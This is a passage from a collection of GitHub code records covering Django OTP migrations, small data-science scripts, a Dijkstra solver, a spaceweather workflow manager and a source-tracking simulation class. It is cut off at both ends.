'1.0'), ('1.1', '1.1'), ('2.0', '2.0')])),\n ('use_ssl', models.BooleanField(default=False, help_text='Use HTTPS API URLs by default?', verbose_name='Use SSL')),\n ('param_sl', models.CharField(default=None, help_text='The level of syncing required.', max_length=16, verbose_name='SL', blank=True)),\n ('param_timeout', models.CharField(default=None, help_text='The time to allow for syncing.', max_length=16, verbose_name='Timeout', blank=True)),\n ],\n options={\n 'verbose_name': 'YubiKey validation service',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='YubikeyDevice',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(help_text='The human-readable name of this device.', max_length=64)),\n ('confirmed', models.BooleanField(default=True, help_text='Is this device ready for use?')),\n ('private_id', models.CharField(default=otp_yubikey.models.default_id, help_text='The 6-byte private ID (hex-encoded).', max_length=12, verbose_name='Private ID', validators=[otp_yubikey.models.id_validator])),\n ('key', models.CharField(default=otp_yubikey.models.default_key, help_text='The 16-byte AES key shared with this YubiKey (hex-encoded).', max_length=32, validators=[otp_yubikey.models.key_validator])),\n ('session', models.PositiveIntegerField(default=0, help_text='The non-volatile session counter most recently used by this device.')),\n ('counter', models.PositiveIntegerField(default=0, help_text='The volatile session usage counter most recently used by this device.')),\n ('user', models.ForeignKey(help_text='The user that this device belongs to.', to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE)),\n ],\n options={\n 'abstract': False,\n 'verbose_name': 'Local YubiKey device',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='remoteyubikeydevice',\n name='service',\n field=models.ForeignKey(to='otp_yubikey.ValidationService', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='remoteyubikeydevice',\n name='user',\n field=models.ForeignKey(help_text='The user that this device belongs to.', to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE),\n preserve_default=True,\n ),\n ]\n","repo_name":"django-otp/django-otp-yubikey","sub_path":"src/otp_yubikey/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4709,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"7722920941","text":"#!/usr/local/bin/python3\n\nfrom sys import argv\nimport cal_course_alerts\n\ndef main():\n if len(argv) < 3:\n email = input(\"Email: \")\n courses = input(\"List course id separated by comma: \")\n else:\n email = argv[1]\n courses = argv[2]\n\n cal_course_alerts.alert(email, courses)\n\nif __name__ == '__main__':\n main()\n","repo_name":"adelaide-chen/check-class-status","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74152871147","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import linear_model\nfrom sklearn.metrics import mean_squared_error\n\n\n\n\nWineQualityDF = pd.read_csv('Python_Lesson5/winequality-red.csv')\n\n\n#Drop missing data\ndata = WineQualityDF.select_dtypes(include=[np.number]).interpolate().dropna()\n\n#Check Data\nprint(WineQualityDF.quality.describe())\n\n#Check for Skewness -- Skewness is approximately symmetric\nprint (\"Skew is:\", WineQualityDF.quality.skew())\n#plt.hist(WineQualityDF.quality, color='blue')\n#plt.show()\n\n#Correlation -- alchohol, volatile acidity, and sulphates are the 3 highest correlated features\nnumeric_features = WineQualityDF.select_dtypes(include=[np.number])\ncorr = numeric_features.corr()\nprint(corr['quality'],'\\n') \n\n#Build Linear Model\ny = WineQualityDF.quality\nX = data[['alcohol','volatile acidity', 'sulphates']]\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.33)\nlr = linear_model.LinearRegression()\nmodel = lr.fit(X_train, y_train)\n\n#R2 Score\nprint (\"R^2 is: \\n\", model.score(X_test, y_test))\n\n#RMSE\npredictions = model.predict(X_test)\nprint ('RMSE is: \\n', mean_squared_error(y_test, predictions))\n\n##visualize\n\nactual_values = y_test\nplt.scatter(predictions, actual_values, alpha=0.25, color='b') #alpha helps to show overlapping data\nplt.xlabel('Predicted Quality')\nplt.ylabel('Actual Quality')\nplt.title('Linear Regression Model')\nplt.show()\n\n\n","repo_name":"zshinyg/CSEE5590","sub_path":"Python_Lesson5/Python_Lesson5_ICP/Prob2.py","file_name":"Prob2.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33254534082","text":"from init import bilstm\nfrom fasttext import fasttexts\nfrom rnn import deepModel, Finisher\nfrom gruwithft import gruwithft\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import KFold\nfrom keras.utils.np_utils import to_categorical # convert to one-hot-encoding\n\nEMBEDDING_FILE = '/home/students/student3_2a/nsdc/text/glove.840B.300d.txt'\ntrain_x = pd.read_csv('/home/students/student3_2a/nsdc/text/train.csv')\ntest_x = pd.read_csv('/home/students/student3_2a/nsdc/text/test.csv')\n\n\n\nmax_features=80000\nmaxlen=150\nembed_size=300\n\nx_train = train_x['title'].fillna(' ')\ntrain_y = train_x['Category'].values\ny_train = to_categorical(train_y)\n\n\ntest_x['title'].fillna(' ')\n\nx_test = test_x['title'].str.lower()\n\n\n# # Vectorize text + Prepare GloVe Embedding\n# tokenizer = text.Tokenizer(num_words=max_features, lower=True)\n# tokenizer.fit_on_texts(list(train_x))\n\n# train_x = tokenizer.texts_to_sequences(train_x)\n# test_x = tokenizer.texts_to_sequences(test_x)\n\n# x_train = sequence.pad_sequences(train_x, maxlen=maxlen)\n# x_test = sequence.pad_sequences(test_x, maxlen=maxlen)\n\nclass Ensemble():\n def __init__(self, n_folds, stacker, base_models):\n self.n_folds = n_folds\n self.stacker = stacker\n self.base_models = base_models\n def fit_predict(self, X, y, T):\n \n folds = list(KFold(n_splits=self.n_folds, shuffle=True, random_state=2017).split(X))\n S_train = np.zeros((X.shape[0], 58*len(self.base_models)))\n S_test = []\n final_test = np.empty((T.shape[0],58*len(self.base_models)))\n for i, clf in enumerate(self.base_models):\n for j, (train_idx, test_idx) in enumerate(folds):\n print(train_idx)\n print(\"On {}{}\".format(i,j))\n X_train = X[train_idx]\n y_train = y[train_idx]\n X_holdout = X[test_idx]\n y_pred, y_test = clf.run(X_train,y_train,X_holdout,T)[:]\n S_train[test_idx, i*58:i*58+58] = y_pred\n S_test.append(y_test)\n final_test[:,i*58:i*58+58] = np.mean(np.array(S_test), axis=0)\n return self.stacker.finish(np.expand_dims(S_train, axis=2), y, np.expand_dims(final_test, axis=2))[:]\n\ngo = Ensemble(5, Finisher((174,1)), [bilstm(),deepModel(),gruwithft()])\ngo.fit_predict(x_train, y_train, x_test)\n","repo_name":"llllxt/Product-Classification","sub_path":"text/stacking/ensemble.py","file_name":"ensemble.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19143410024","text":"import pyximport; pyximport.install()\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n\ndef main():\n work_dir = 'final-long-running-test'\n\n # Plot general loss\n plot(os.path.join(work_dir, 'loss.csv'), 0, -1, loss_label='Gesamter Fehler')\n plot(os.path.join(work_dir, 'loss_prob.csv'), 0, -1, loss_label='Prob Fehler')\n\n # Plot reg loss\n plot(os.path.join(work_dir, 'loss_reg.csv'), 0, -1, loss_label='L2 Regulierungs Fehler', y_lim=(0.49, 0.55))\n plot(os.path.join(work_dir, 'loss_reg.csv'), 100, 500, loss_label='L2 Regulierungs Fehler', y_lim=(0.49, 0.55))\n\n\ndef plot(stats_file, lower_bound, upper_bound, smoothing=0.9, loss_label='Fehler', y_lim=None):\n x_scaling = 1 / 1000 # Show thousands on x axis\n\n stats = np.loadtxt(stats_file, skiprows=1, delimiter=',')\n stats = np.transpose(stats) # Change axis for easy selection\n x_steps = stats[1][lower_bound:upper_bound] * x_scaling\n y_loss = stats[2][lower_bound:upper_bound]\n\n smoothed_loss = [y_loss[0]]\n for i in range(1, len(y_loss)):\n smoothed_loss.append(smoothing * smoothed_loss[i - 1] + (1 - smoothing) * y_loss[i])\n\n plt.plot(x_steps, y_loss, alpha=0.4)\n plt.plot(x_steps, smoothed_loss)\n if y_lim:\n plt.ylim(y_lim)\n plt.xlabel('Batch (in 1000)')\n plt.ylabel(loss_label)\n\n # Markers for important part\n plt.axvline(x=1500000 * x_scaling, color='r')\n plt.axvline(x=2100000 * x_scaling, color='r')\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"FritzFlorian/bachelor-thesis-code","sub_path":"reversialphazero/distributed_8_by_8/plot_losses.py","file_name":"plot_losses.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29481319436","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nfrom setuptools import setup\n\n\ntry:\n long_description = open(b'README.rst', 'rt').read()\nexcept IOError:\n long_description = \"\"\n\ntry:\n long_description += open(b'ChangeLog.rst', 'rt').read().strip()\nexcept IOError:\n pass\n\n\nMODULE_PATH = os.path.join(os.getcwd(), \"encrypted_id\", \"__init__.py\")\n\n\ndef find_this(search, filename=MODULE_PATH):\n \"\"\"Take a string and a filename path string and return the found value.\"\"\"\n if not search:\n return\n for line in open(str(filename)).readlines():\n if search.lower() in line.lower():\n line = line.split(\"=\")[1].strip()\n if \"'\" in line or '\"' in line or '\"\"\"' in line:\n line = line.replace(\"'\", \"\").replace('\"', '').replace('\"\"\"', '')\n return line\n\n\nprint(find_this(\"__version__\"))\n\nsetup(\n name=\"django-encrypted-id\",\n description=\"Encrypted IDs for Django Models\",\n long_description=long_description,\n\n version=find_this(\"__version__\"),\n\n author=find_this(\"__author__\"),\n author_email=find_this(\"__email__\"),\n maintainer=find_this(\"__author__\"),\n maintainer_email=find_this(\"__email__\"),\n\n url=find_this(\"__source__\"),\n license=find_this(\"__license__\"),\n\n\n install_requires=[\n \"Django>=1.8\", \"pycryptodomex\",\n ],\n\n\n packages=[\"encrypted_id\"],\n zip_safe=True,\n\n\n keywords=['Django', 'Web'],\n\n\n classifiers=[\n\n 'Development Status :: 5 - Production/Stable',\n\n 'Intended Audience :: Developers',\n 'Intended Audience :: End Users/Desktop',\n 'Intended Audience :: System Administrators',\n 'Intended Audience :: Information Technology',\n 'Intended Audience :: Other Audience',\n\n 'Natural Language :: English',\n\n 'Operating System :: OS Independent',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: MacOS :: MacOS X',\n\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n\n 'Programming Language :: Python :: Implementation :: CPython',\n\n 'Topic :: Software Development',\n\n ],\n)\n","repo_name":"amitu/django-encrypted-id","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"37"} +{"seq_id":"22103443151","text":"##輸入小於255的數字##\n\nnum = 256\nwhile num > 255:\n num = eval(input('輸入一個十進位的數字: '))\n if num <= 255:\n break\nprint('十進位:', num)\n\n##轉為2進位##\n\n# 計算出二進位數字\nbinary_num_2 = []\nmod_num_2 = []\nbinary_num_2.append(num // (2**(7)))\nmod_num_2.append(num % (2**(7)))\n\nfor i in range(7):\n binary_num_2.append(mod_num_2[i] // (2**(6-i)))\n mod_num_2.append(mod_num_2[i] % (2**(6-i)))\n\n# 去除開頭的0\n\nfor j in range(len(binary_num_2)):\n if binary_num_2[0] == 0:\n binary_num_2.pop(0)\n else:\n break\n\n# 列出數字\nprint('二進位: ', end='')\nfor k in range(len(binary_num_2)):\n print(binary_num_2[k], end='')\n\n\n##轉為16進位##\n\nbit_16 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 'A', 'B', 'C', 'D', 'E', 'F']\nbit_2 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n\n# 計算出16進位數字\nbinary_num_16 = []\nmod_num_16 = []\nbinary_num_16.append(num // (16**(1)))\nmod_num_16.append(num % (16**(1)))\nbinary_num_16.append(mod_num_16[0] // (16**(0)))\nmod_num_16.append(mod_num_16[0] % (16**(0)))\n\n# 去除開頭的0\n\nfor j in range(len(binary_num_16)):\n if binary_num_16[0] == 0:\n binary_num_16.pop(0)\n else:\n break\n\n# 將大於10的數字更換成字母\n\nfor j in range(len(binary_num_16)):\n binary_num_16[j] = bit_16[bit_2.index(binary_num_16[j])]\n\n# 列出數字\nprint('')\nprint('16進位: ', end='')\nfor k in range(len(binary_num_16)):\n print(binary_num_16[k], end='')\n\n \n \n \n \n \n# 輸出結果: \n# PS C:\\Users\\bruce\\vscode\\code> & C:/Users/bruce/AppData/Local/Programs/Python/Python38/python.exe c:/Users/bruce/vscode/code/converter.py\n# 輸入一個十進位的數字: 234\n# 十進位: 234\n# 二進位: 11101010\n# 16進位: EA\n\n","repo_name":"bruce0512/Basic_Data_structure_and_Algorithms","sub_path":"hw1_binary_hex_converter.py","file_name":"hw1_binary_hex_converter.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3605666061","text":"import heapq\nimport sys\ninput = sys.stdin.readline\nINF = int(1e9)\n\nV,E = map(int,input().split())\nstart = int(input())\ngraph = [[] for _ in range(V+1)] # 그래프 정보를 넣어줄 리스트 선언\ndistance = [INF]*(V+1) # 최단경로 리스트 선언\nvisited = [False]*(V+1) # 방문표시 리스트 선언\nfor i in range(E) :\n u,v,w = map(int,input().split())\n graph[u].append((v,w)) # u에서 v로가는 비용이 w다.\n\ndef dijkstra(start) :\n q = [] # 힙만들어주기\n distance[start] = 0 # start의 최단경로는 0으로 만들어준다.\n heapq.heappush(q,(0,start)) # 최단경로와 본인의 노드지점의 쌍을 힙에 넣어줌\n while q :\n # 가장 짧은 최단경로의 노드에 대한 정보를 꺼낸다.\n dist, now = heapq.heappop(q)\n if distance[now] < dist :\n continue\n for i in graph[now] :\n cost = dist + i[1]\n if cost < distance[i[0]] :\n distance[i[0]] = cost\n heapq.heappush(q,(cost,i[0]))\n\ndijkstra(start)\n\nfor i in range(1,V+1) :\n if distance[i] == INF :\n print(\"INF\")\n else :\n print(distance[i])","repo_name":"kiki249049/Baekjoon","sub_path":"백준/Gold/1753. 최단경로/최단경로.py","file_name":"최단경로.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43309883203","text":"import datetime\nfrom mainPage.models import Block\nimport requests\n\n\ndef fetch_blocs(date=datetime.date.today().isoformat()):\n\turl = 'https://bcschain.info/api/blocks?date={}'.format(date)\n\tresponse = requests.get(url)\n\tblocks = response.json()\n\tfor block in blocks:\n\t\tblock_to_save = Block(\n\t\t\thash=block['hash'],\n\t\t\theight=block['height'],\n\t\t\ttimestamp=block['timestamp'],\n\t\t\tiso_timestamp=datetime.datetime.utcfromtimestamp(block['timestamp']),\n\t\t\tinterval=block['interval'],\n\t\t\tsize=block['size'],\n\t\t\ttransactionCount=block['transactionCount'],\n\t\t\tminer=block['miner'],\n\t\t\treward=block['reward'],\n\t\t)\n\t\tif not Block.objects.filter(hash=block['hash']).exists():\n\t\t\tblock_to_save.save()\n\n","repo_name":"hungryhost/bcs_test_app","sub_path":"bcsproject/helpers/fetcher.py","file_name":"fetcher.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29568015513","text":"import sys\n#sys.path.append(\"../\")\nfrom manager import workflow\nimport os\nimport pony.orm as pny\nimport datetime\nimport time\nimport json\nfrom base64 import b64decode\nfrom Database import LocalDataStorage\nfrom Database.workflow import Simulation, Incident\n#from DataManager.client import registerDataWithDM, putByteDataViaDM, DataManagerException\nfrom DataManager.client import moveDataViaDM, DataManagerException, getInfoForDataInDM, putByteDataViaDM, registerDataWithDM, copyDataViaDM, getLocalFilePathPrepend\nfrom SimulationManager.client import createSimulation, submitSimulation, SimulationManagerException\nfrom ExternalDataInterface.client import registerEndpoint, ExternalDataInterfaceException, removeEndpoint\n\n# create and submit jobs\ndef _launch_simulation(msg, callback='spaceweather_postprocess'):\n print(\"\\nSpaceweather simulation submit handler\")\n IncidentID = msg[\"IncidentID\"]\n CaseName = msg['SimulationCase']\n ParaViewAddress = msg['ParaViewAddress']\n ParaViewPort = msg['ParaViewPort']\n print(msg)\n if CaseName is None:\n print('Case name is none!')\n return\n\n try:\n callbacks = { 'COMPLETED': callback }\n sim_id = createSimulation(IncidentID,\n 1,\n '00:15:00',\n CaseName,\n 'run_spaceweather.sh %s %s %d' % (CaseName, ParaViewAddress, ParaViewPort),\n callbacks,\n template_dir='template_'+CaseName)\n submitSimulation(sim_id)\n except SimulationManagerException as err:\n print(\"Error creating or submitting simulation \"+err.message)\n return\n\n@workflow.handler\ndef iPIC3D_2D_B0z0_0(msg):\n print(\"\\nSpaceweather base simulation\")\n IncidentId = msg[\"IncidentID\"]\n try:\n _launch_simulation(msg)\n workflow.send(queue=\"spaceweather_postprocess\", message=msg) # dummy connection\n except e:\n print('Error launching base case '+e.message)\n\n@workflow.handler\ndef iPIC3D_2D_B0z0_0195(msg):\n print(\"\\nSpaceweather B0z 0.0195 simulation\")\n IncidentId = msg[\"IncidentID\"]\n try:\n _launch_simulation(msg)\n workflow.send(queue=\"spaceweather_postprocess\", message=msg) # dummy connection\n except e:\n print('Error launching B0z 0.0195 case '+e.message)\n\n@workflow.handler\ndef iPIC3D_2D_B0z0_00975(msg):\n print(\"\\nSpaceweather B0z 0.00975 simulation\")\n IncidentId = msg[\"IncidentID\"]\n try:\n _launch_simulation(msg)\n workflow.send(queue=\"spaceweather_postprocess\", message=msg) # dummy connection\n except e:\n print('Error launching B0z 0.00975 case '+e.message)\n\n@workflow.handler\ndef iPIC3D_2D_B0z0_039(msg):\n print(\"\\nSpaceweather B0z 0.039 simulation\")\n IncidentId = msg[\"IncidentID\"]\n try:\n _launch_simulation(msg)\n workflow.send(queue=\"spaceweather_postprocess\", message=msg) # dummy connection\n except e:\n print('Error launching B0z 0.039 case '+e.message)\n \n# space weather init\n@workflow.handler\ndef spaceweather_init(msg):\n print(\"\\nSpaceweather simulation init handler\")\n IncidentID = msg[\"IncidentID\"]\n\n #workflow.setIncidentActive(IncidentID)\n pv_address = os.environ['PV_ADDRESS'] if 'PV_ADDRESS' in os.environ else 'steven-XPS-13-9370'\n\n msg['SimulationCase'] = '2D_B0z0.039'\n msg['ParaViewAddress'] = pv_address\n msg['ParaViewPort'] = 22228\n workflow.send(queue=\"iPIC3D_2D_B0z0_039\", message=msg)\n\n msg['SimulationCase'] = '2D_B0z0.00975'\n msg['ParaViewAddress'] = pv_address\n msg['ParaViewPort'] = 22226\n workflow.send(queue=\"iPIC3D_2D_B0z0_00975\", message=msg)\n\n msg['SimulationCase'] = '2D_B0z0.0195'\n msg['ParaViewAddress'] = pv_address\n msg['ParaViewPort'] = 22224\n workflow.send(queue=\"iPIC3D_2D_B0z0_0195\", message=msg)\n\n msg['SimulationCase'] = '2D_B0z0.0'\n msg['ParaViewAddress'] = pv_address\n msg['ParaViewPort'] = 22222\n workflow.send(queue=\"iPIC3D_2D_B0z0_0\", message=msg)\n\n# space weather shutdown\n@workflow.handler\ndef spaceweather_postprocess(msg):\n\n IncidentID = msg[\"IncidentID\"]\n originator = msg['originator']\n logs = workflow.Persist.Get(IncidentID)\n print(\"\\nSpaceweather simulation postprocess handler\", IncidentID)\n\n if originator == 'Simulation Completed':\n simulationId = msg[\"simulationId\"]\n simulationIdPostfix=simulationId.split(\"-\")[-1]\n directoryListing=msg[\"directoryListing\"]\n\n print(\"\\nResults available for wildfire analyst simulation!\") \n\n with pny.db_session:\n myincident = Incident[IncidentID]\n simulation=Simulation[simulationId]\n machine_name=simulation.machine.machine_name\n machine_basedir=simulation.machine.base_work_dir\n if machine_basedir[-1] != \"/\": machine_basedir+=\"/\"\n\n if simulation is not None:\n result_files={}\n for entry in directoryListing:\n # '193993425 96 -rw-rw-r-- 1 vestec vestec 97574 Nov 28 15:48 incident-bb97271000f5/simulation-a350bba3ee36/output_log.txt'\n tokens=entry.split()\n if len(tokens) == 11 and \"data\" in tokens[-1]:\n result_files[tokens[-1]]=int(tokens[6])\n\n data_uuids = []\n for filepath, filesize in result_files.items():\n filename = os.path.basename(filepath)\n directory = os.path.dirname(filepath)\n print(filename, directory, filesize)\n\n # register output data with data manager\n try:\n #if \".vtu\" in filename:\n # data_uuid=registerDataWithDM(filename.replace('(', r'\\(').replace(')', r'\\)'), machine_name, \"spaceweahter simulation (\"+simulation.kind+\")\",\n # \"application/xml\", filesize, \"vtu\", path=directory, associate_with_incident=True, incidentId=IncidentID,\n # kind=simulation.kind, comment=\"Basecase created by iPICmini on \"+machine_name)\n #elif \".ttk\" in filename:\n # data_uuid=registerDataWithDM(filename.replace('(', r'\\(').replace(')', r'\\)'), machine_name, \"spaceweahter simulation (\"+simulation.kind+\")\",\n # \"application/octet-stream\", filesize, \"ttk\", path=directory, associate_with_incident=True, incidentId=IncidentID,\n # kind=simulation.kind, comment=\"Basecase created by iPICmini on \"+machine_name)\n # data_uuids.append(data_uuid)\n #elif \".csv\" in filename:\n # data_uuid=registerDataWithDM(filename.replace('(', r'\\(').replace(')', r'\\)'), machine_name, \"spaceweahter simulation (\"+simulation.kind+\")\",\n # \"text/csv\", filesize, \"csv\", path=directory, associate_with_incident=True, incidentId=IncidentID,\n # kind=simulation.kind, comment=\"Basecase created by iPICmini on \"+machine_name)\n # data_uuids.append(data_uuid)\n if \".vtk\" in filename and (\"B\" in filename or \"E\" in filename or \"rho\" in filename or \"J\" in filename) and '2500' in filename:\n data_uuid=registerDataWithDM(filename.replace('(', r'\\(').replace(')', r'\\)'), machine_name, \"spaceweahter simulation (\"+simulation.kind+\")\",\n \"application/octet-stream\", filesize, \"vtk\", path=directory, associate_with_incident=True, incidentId=IncidentID,\n kind=simulation.kind, comment=\"Basecase created by iPICmini on \"+machine_name)\n data_uuids.append(data_uuid)\n\n except DataManagerException as err:\n print(\"Error registering spaceweahter base result data with data manager, aborting \"+err.message)\n\n\n workflow.Persist.Put(IncidentID, {'type': 'postprocessed'})\n logs = workflow.Persist.Get(IncidentID)\n print(logs)\n \n completed = 0\n for log in logs:\n if 'type' in log or log['type'] == 'postprocessed':\n completed = completed + 1\n\n if completed >= 4:\n print('All simulation completed')\n workflow.send(queue='spaceweather_shutdown', message=msg)\n else:\n print(\"Ignore originator with \"+originator)\n return\n\n#@workflow.handler\n#def spaceweather_postprocess(msg):\n# IncidentID = msg[\"IncidentID\"]\n# originator = msg[\"originator\"]\n#\n# if originator == 'Simulation Compmleted':\n# workflow.Persist.Put(IncidentID, {'type': 'postprocessed'})\n# logs = workflow.Persist.Get(IncidentID)\n# print(logs)\n#\n# completed = 0\n# if len(logs) >= 3:\n# for log in logs:\n# if 'type' in log or log['type'] == 'postprocessed':\n# completed = completed + 1\n#\n# if completed >= 3:\n# print('All simulation completed')\n# workflow.send(queue='spaceweather_shutdown', message=msg)\n# else:\n# workflow.Persist.Put(IncidentID, { 'orginator': originator })\n\n####\n #workflow.Persist.Put(IncidentID, {\"type\": \"postprocssed\", \"originator\": CaseName})\n #logs = workflow.Persist.Get(IncidentID)\n #print(logs)\n\n #_2Dxy = False\n #_2DxyGuideCase1 = False\n #_2DxyGuideCase2 = False\n\n #for log in logs:\n # if \"type\" in log and log[\"processed\"] == \"shutdown\":\n # if log[\"originator\"] == \"spaceweather_base_simulation\" : _2Dxy=True\n # if log[\"originator\"] == \"spaceweather_GuideCase1_simulation\": _2DxyGuideCase1=True\n # if log[\"originator\"] == \"spaceweather_GuideCase2_simulation\": _2DxyGuideCase2=True\n\n #if _2Dxy is True and _2DxyGuideCase1 is True and _2DxyGuideCase2 is True:\n # print('Complete incident', IncidentID)\n # workflow.send(queue=\"spaceweather_shutdown\", message=msg)\n\n@workflow.handler\ndef spaceweather_shutdown(msg):\n print(\"\\nSpaceweather simulation shutdown handler\")\n IncidentID = msg[\"IncidentID\"]\n workflow.Complete(IncidentID)\n\n# we have to register them with the workflow system\ndef RegisterHandlers():\n workflow.RegisterHandler(handler=iPIC3D_2D_B0z0_0, queue=\"iPIC3D_2D_B0z0_0\")\n workflow.RegisterHandler(handler=iPIC3D_2D_B0z0_0195, queue=\"iPIC3D_2D_B0z0_0195\")\n workflow.RegisterHandler(handler=iPIC3D_2D_B0z0_00975, queue=\"iPIC3D_2D_B0z0_00975\")\n workflow.RegisterHandler(handler=iPIC3D_2D_B0z0_039, queue=\"iPIC3D_2D_B0z0_039\")\n workflow.RegisterHandler(handler=spaceweather_init, queue=\"spaceweather_init\")\n workflow.RegisterHandler(handler=spaceweather_postprocess, queue=\"spaceweather_postprocess\")\n workflow.RegisterHandler(handler=spaceweather_shutdown, queue=\"spaceweather_shutdown\")","repo_name":"VESTEC-EU/vestec-system","sub_path":"WorkflowManager/workflows/spaceweather/spaceweather.py","file_name":"spaceweather.py","file_ext":"py","file_size_in_byte":11133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37408983471","text":"# Download the helper library from https://www.twilio.com/docs/python/install\nfrom twilio.rest import Client\n\n\n# Your Account Sid and Auth Token from twilio.com/console\naccount_sid = 'AC9xxxxxxxxxxxxxxxxxxxxxxxxxxxx99'\nauth_token = '64xxxxxxxxxxxxxxxxxxxxxxxxxxx8'\nclient = Client(account_sid, auth_token)\n\nmodel_build = client.autopilot \\\n .assistants('UAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxa') \\\n .model_builds \\\n .create(unique_name='v0.5')\n\nprint(model_build.sid)\n","repo_name":"leewalter/coding","sub_path":"python/Twilio/AutoPilot/build_training_model.py","file_name":"build_training_model.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13501740344","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Provides the SourceTracking class, to simulate the source-tracking POMDP.\"\"\"\n\nimport numpy as np\nimport warnings\nfrom copy import deepcopy\nfrom scipy.special import kv\nfrom scipy.special import kn\nfrom scipy.special import gamma as Gamma\nfrom scipy.stats import poisson as Poisson_distribution\n\n# _____________________ parameters _____________________\nEPSILON = 1e-10\n# ________________________________________________________\n\n\nclass SourceTracking:\n \"\"\"Environment used to simulate the source-tracking POMDP.\n\n Args:\n Ndim (int):\n number of space dimensions (1D, 2D...)\n lambda_over_dx (float):\n dimensionless problem size (odor dispersion lengthscale divided by agent step size)\n R_dt (float):\n dimensionless source intensity (source rate of emission multiplied by the agent time step)\n norm_Poisson ('Euclidean', 'Manhattan' or 'Chebyshev', optional):\n norm used for hit detections (default='Euclidean')\n Ngrid (int or None, optional):\n linear size of the domain, set automatically if None (default=None)\n Nhits (int or None, optional):\n number of possible hit values, set automatically if None (default=None)\n draw_source (bool, optional):\n whether to actually draw the source location (otherwise uses Bayesian framework) (default=False)\n initial_hit (int or None, optional):\n value of the initial hit, if None drawn randomly according to relevant probability distribution (default=None)\n dummy (bool, optional):\n set automatic parameters (e.g., Ngrid) but does not initialize the POMDP (default=False)\n\n Attributes:\n Ndim (int):\n number of dimension of space (1D, 2D...)\n lambda_over_dx (float):\n dimensionless problem size (odor dispersion lengthscale divided by agent step size)\n R_dt (float):\n dimensionless source intensity (source rate of emission multiplied by the agent time step)\n norm_Poisson (str):\n norm used for hit detections: 'Euclidean', 'Manhattan' or 'Chebyshev'\n Ngrid (int):\n linear size of the domain\n Nhits (int):\n number of possible hit values\n draw_source (bool):\n whether a source location is actually drawn (otherwise uses Bayesian framework)\n initial_hit (int):\n value of the initial hit\n Nactions (int):\n number of possible actions\n NN_input_shape (tuple(int)):\n shape of the input array for neural network models\n mu0_Poisson (float):\n mean number of hits at a distance lambda_over_dx from the source\n agent (list(int)):\n current agent location\n p_source (ndarray):\n current probability distribution of the source location)\n obs (dict):\n current observation (\"hit\" and \"done\")\n hit_map (ndarray):\n number of hits received for each location (-1 for cells not visited ye\n cumulative_hits (int):\n cumulated sum of hits received (ignoring initial hit)\n agent_near_boundaries (bool):\n whether the agent is currently near a boundary\n agent_stuck (bool):\n whether the agent is currently stuck in an \"infinite\" loop\n\n\n\n \"\"\"\n\n def __init__(\n self,\n Ndim,\n lambda_over_dx,\n R_dt,\n norm_Poisson='Euclidean',\n Ngrid=None,\n Nhits=None,\n draw_source=False,\n initial_hit=None,\n dummy=False,\n ):\n\n self.Ndim = int(Ndim)\n if self.Ndim < 1:\n raise Exception(\"Ndim must be a positive integer\")\n\n self.lambda_over_dx = lambda_over_dx\n self.R_dt = R_dt\n if self.lambda_over_dx < 1.0 or self.R_dt <= 0.0:\n raise Exception(\"lambda_over_dx must be >= 1.0 and R_dt must be > 0.0\")\n\n self.norm_Poisson = norm_Poisson\n if not (self.norm_Poisson in ('Euclidean', 'Manhattan', 'Chebyshev')):\n raise Exception(\"norm_Poisson must be 'Euclidean', 'Manhattan' or 'Chebyshev'\")\n\n self._set_mu0_Poisson()\n\n if Nhits is None:\n self.Nhits = self._autoset_Nhits()\n else:\n self.Nhits = int(Nhits)\n if self.Nhits < 2:\n raise Exception(\"Nhits must be at least 2\")\n\n if 